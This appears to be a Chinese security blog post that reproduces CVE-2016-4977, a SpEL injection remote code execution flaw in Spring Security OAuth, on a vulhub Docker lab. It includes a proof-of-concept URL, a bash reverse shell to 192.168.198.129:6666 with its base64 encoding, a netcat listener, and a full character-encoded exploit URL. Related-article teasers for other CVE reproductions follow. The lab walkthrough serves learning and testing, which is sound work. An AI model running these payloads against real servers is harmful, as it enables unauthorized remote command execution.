漏洞复现笔记(CVE-2016-4977)

于 2024-06-14 14:02:54 发布
阅读量253 收藏 5
点赞数 10
文章标签: 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139679979
版权

漏洞描述

Spring Security OAuth 是为了Spring 框架提供安全认证支持的一个模块。在其使用 white label views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令

影响范围

2.0.0-2.0.9
1.0.0-1.0.5

环境搭建

  • 进入靶场

  • cd vulhub/spring/CVE-2016-4977

  • 开启靶场

  • docker-compose up -d

  • 查看靶场信息

  • docker ps

  • 访问网址

  • http://youip:8080

复现过程

访问路径 /oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是SpringBoot
然后会让我们登入,默认账号密码admin:admin

poc验证是否存在漏洞

  • /oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

可以看到存在漏洞,接着反弹shell回来

反弹shell

先将反弹shell命令进行bash64编码

  • bash -i >& /dev/tcp/192.168.198.129/6666 0>&1
  • CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xOTguMTI5LzY2NjYgMD4mMQ==

然后放入以下格式

bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xOTguMTI5LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

kali监听6666端口

  • nu -lvvp 6666

构造反弹shellPOC
http://your-ip:8080/oauth/authorize?response_type=上面的那一长串POC&client_id=acme&scope=openid&redirect_uri=http://test

http://192.168.198.129:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(87)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(57)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(53)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(81)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

然后访问链接就可以看到监听端口回显

关闭镜像

docker-compose down

纪瑾
关注
复现CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞
记录并分享学习安全的知识点..
01-15 917
一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 二、漏洞复现 发现页面如下: poc如下: http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme
WordPress插件File-Manager任意文件上传漏洞复现CVE-2020-25213)
千寻的博客
01-26 1918
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
最新发布
精品博客,你值得一看~
09-02 1299
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5163
cve-2016-4977(spring-security-oauth) RCE漏洞复现
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1294
复现Spring(CVE-2016-4977),并且在IDEA中实现动态调试
spring security oauth rce (cve-2016-4977) 漏洞分析
whatday的专栏
07-02 1066
背景描述 Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。 漏洞详细 Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc,大概了解一下整个过程。 http://localhost:8080/oauth/authorize?resp
shiro反序列化漏洞详解与复现(shiro-550/CVE-2016-4437)
ccccai22的博客
08-28 250
shiro反序列化漏洞(shiro-550/CVE-2016-4437)
【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2283
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现
weixin_33862514的博客
02-14 759
目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考 影响版本: 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言 这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样,而且漏洞爆出来的时间点也差不多,可是...
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 587
Docker复现SpringBoot CVE-2016-4977
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 797
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
EC_Carrot的博客
08-02 725
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞复现 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录
weixin_42513429的博客
08-19 295
https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客,对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入 影响范围(复制来的): Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1509
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
Spring Security OAuth2 远程命令执行漏洞 CVE-2016-4977 漏洞复现
ADummy的博客
03-02 300
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值